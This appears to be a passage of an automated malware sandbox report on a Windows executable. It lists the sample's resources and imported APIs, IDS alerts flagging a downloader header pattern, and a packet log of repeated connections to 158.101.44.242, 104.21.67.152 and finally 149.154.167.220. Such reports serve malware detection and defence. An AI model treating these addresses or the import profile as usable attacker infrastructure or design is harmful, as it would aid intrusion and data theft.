RT_STRING	0xd7150	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xd77ac	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xd7c14	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xd7d6c	0x2ca1d	data			1.0003610246536079
RT_GROUP_ICON	0x10478c	0x14	data	English	Great Britain	1.2
RT_GROUP_ICON	0x1047a0	0x14	data	English	Great Britain	1.15
RT_VERSION	0x1047b4	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x104890	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-17T09:41:25.108285+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49706	158.101.44.242	80	TCP
2024-12-17T09:41:27.514527+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49706	158.101.44.242	80	TCP
2024-12-17T09:41:29.137035+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49708	104.21.67.152	443	TCP
2024-12-17T09:41:30.530148+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49709	158.101.44.242	80	TCP
2024-12-17T09:41:32.141927+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49710	104.21.67.152	443	TCP
2024-12-17T09:41:33.514607+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49711	158.101.44.242	80	TCP
2024-12-17T09:41:38.351911+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49716	104.21.67.152	443	TCP
2024-12-17T09:41:44.336851+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49720	104.21.67.152	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 17, 2024 09:41:23.347832918 CET	49706	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:23.467504978 CET	80	49706	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:23.467890024 CET	49706	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:23.468189955 CET	49706	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:23.587882042 CET	80	49706	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:24.670916080 CET	80	49706	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:24.690713882 CET	49706	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:24.811306000 CET	80	49706	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:25.065179110 CET	80	49706	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:25.108284950 CET	49706	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:25.251673937 CET	49707	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:25.251704931 CET	443	49707	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:25.251854897 CET	49707	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:25.260519028 CET	49707	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:25.260530949 CET	443	49707	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:26.477339983 CET	443	49707	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:26.477411985 CET	49707	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:26.482804060 CET	49707	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:26.482810974 CET	443	49707	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:26.483172894 CET	443	49707	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:26.530133009 CET	49707	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:26.543282032 CET	49707	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:26.587340117 CET	443	49707	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:27.050420046 CET	443	49707	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:27.050489902 CET	443	49707	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:27.050616026 CET	49707	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:27.082355022 CET	49707	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:27.093934059 CET	49706	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:27.213737965 CET	80	49706	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:27.467632055 CET	80	49706	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:27.470525026 CET	49708	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:27.470591068 CET	443	49708	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:27.470766068 CET	49708	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:27.471079111 CET	49708	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:27.471108913 CET	443	49708	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:27.514527082 CET	49706	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:28.691755056 CET	443	49708	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:28.694574118 CET	49708	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:28.694595098 CET	443	49708	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:29.137069941 CET	443	49708	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:29.137140036 CET	443	49708	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:29.137279034 CET	49708	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:29.137895107 CET	49708	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:29.142052889 CET	49706	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:29.151230097 CET	49709	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:29.262527943 CET	80	49706	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:29.262656927 CET	49706	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:29.270977974 CET	80	49709	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:29.271080971 CET	49709	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:29.271258116 CET	49709	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:29.391092062 CET	80	49709	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:30.483529091 CET	80	49709	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:30.484865904 CET	49710	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:30.484896898 CET	443	49710	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:30.484957933 CET	49710	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:30.485738039 CET	49710	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:30.485747099 CET	443	49710	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:30.530148029 CET	49709	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:31.695952892 CET	443	49710	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:31.697946072 CET	49710	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:31.697977066 CET	443	49710	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:32.141942978 CET	443	49710	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:32.142009020 CET	443	49710	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:32.142050028 CET	49710	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:32.142642975 CET	49710	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:32.146476984 CET	49709	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:32.147645950 CET	49711	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:32.266427040 CET	80	49709	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:32.266549110 CET	49709	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:32.267292023 CET	80	49711	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:32.267386913 CET	49711	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:32.267570972 CET	49711	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:32.387191057 CET	80	49711	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:33.471648932 CET	80	49711	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:33.473203897 CET	49712	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:33.473254919 CET	443	49712	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:33.473489046 CET	49712	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:33.473619938 CET	49712	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:33.473644972 CET	443	49712	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:33.514606953 CET	49711	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:34.687482119 CET	443	49712	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:34.689183950 CET	49712	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:34.689210892 CET	443	49712	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:35.130321980 CET	443	49712	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:35.130400896 CET	443	49712	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:35.130490065 CET	49712	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:35.130985022 CET	49712	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:35.135500908 CET	49714	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:35.255207062 CET	80	49714	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:35.255283117 CET	49714	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:35.255482912 CET	49714	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:35.375124931 CET	80	49714	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:36.461808920 CET	80	49714	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:36.463072062 CET	49716	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:36.463104963 CET	443	49716	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:36.463171959 CET	49716	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:36.463433981 CET	49716	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:36.463448048 CET	443	49716	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:36.514523983 CET	49714	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:37.673212051 CET	443	49716	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:37.674850941 CET	49716	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:37.674875975 CET	443	49716	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:38.351960897 CET	443	49716	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:38.352005959 CET	443	49716	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:38.352360010 CET	49716	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:38.352663994 CET	49716	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:38.356004953 CET	49714	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:38.357125998 CET	49717	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:38.476097107 CET	80	49714	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:38.476191998 CET	49714	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:38.476778984 CET	80	49717	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:38.476929903 CET	49717	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:38.477087021 CET	49717	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:38.596746922 CET	80	49717	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:39.690244913 CET	80	49717	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:39.692323923 CET	49718	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:39.692380905 CET	443	49718	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:39.692451000 CET	49718	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:39.692857027 CET	49718	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:39.692871094 CET	443	49718	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:39.733300924 CET	49717	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:40.902565002 CET	443	49718	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:40.904202938 CET	49718	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:40.904237986 CET	443	49718	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:41.347091913 CET	443	49718	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:41.347258091 CET	443	49718	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:41.347342014 CET	49718	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:41.347881079 CET	49718	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:41.351330042 CET	49717	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:41.352922916 CET	49719	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:41.471438885 CET	80	49717	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:41.471566916 CET	49717	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:41.472635031 CET	80	49719	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:41.472743988 CET	49719	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:41.472887993 CET	49719	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:41.592508078 CET	80	49719	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:42.676666975 CET	80	49719	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:42.678009987 CET	49720	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:42.678035975 CET	443	49720	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:42.678328037 CET	49720	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:42.678361893 CET	49720	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:42.678368092 CET	443	49720	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:42.717678070 CET	49719	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:43.892374992 CET	443	49720	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:43.894085884 CET	49720	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:43.894107103 CET	443	49720	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:44.336935997 CET	443	49720	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:44.337198019 CET	443	49720	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:44.337327957 CET	49720	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:44.337879896 CET	49720	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:44.341116905 CET	49719	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:44.342169046 CET	49721	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:44.461189032 CET	80	49719	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:44.461318970 CET	49719	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:44.461985111 CET	80	49721	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:44.462063074 CET	49721	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:44.462203026 CET	49721	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:44.582001925 CET	80	49721	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:45.675975084 CET	80	49721	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:45.677520037 CET	49722	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:45.677573919 CET	443	49722	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:45.677673101 CET	49722	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:45.678142071 CET	49722	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:45.678154945 CET	443	49722	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:45.717701912 CET	49721	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:46.936577082 CET	443	49722	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:46.938599110 CET	49722	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:46.938627958 CET	443	49722	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:47.380875111 CET	443	49722	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:47.380949020 CET	443	49722	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:47.381000042 CET	49722	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:47.381560087 CET	49722	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:47.384463072 CET	49721	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:47.385674000 CET	49723	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:47.504595041 CET	80	49721	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:47.504719973 CET	49721	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:47.505362988 CET	80	49723	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:47.505440950 CET	49723	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:47.505641937 CET	49723	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:47.625401974 CET	80	49723	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:48.710066080 CET	80	49723	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:48.711731911 CET	49724	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:48.711782932 CET	443	49724	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:48.711888075 CET	49724	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:48.712210894 CET	49724	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:48.712222099 CET	443	49724	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:48.764590979 CET	49723	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:49.922450066 CET	443	49724	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:49.924129009 CET	49724	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:49.924169064 CET	443	49724	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:50.379076004 CET	443	49724	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:50.379221916 CET	443	49724	104.21.67.152	192.168.2.8
Dec 17, 2024 09:41:50.379338026 CET	49724	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:50.379774094 CET	49724	443	192.168.2.8	104.21.67.152
Dec 17, 2024 09:41:50.430682898 CET	49723	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:50.550944090 CET	80	49723	158.101.44.242	192.168.2.8
Dec 17, 2024 09:41:50.551026106 CET	49723	80	192.168.2.8	158.101.44.242
Dec 17, 2024 09:41:50.571667910 CET	49725	443	192.168.2.8	149.154.167.220
Dec 17, 2024 09:41:50.571716070 CET	443	49725	149.154.167.220	192.168.2.8
Dec 17, 2024 09:41:50.571788073 CET	49725	443	192.168.2.8	149.154.167.220
Dec 17, 2024 09:41:50.572251081 CET	49725	443	192.168.2.8	149.154.167.220
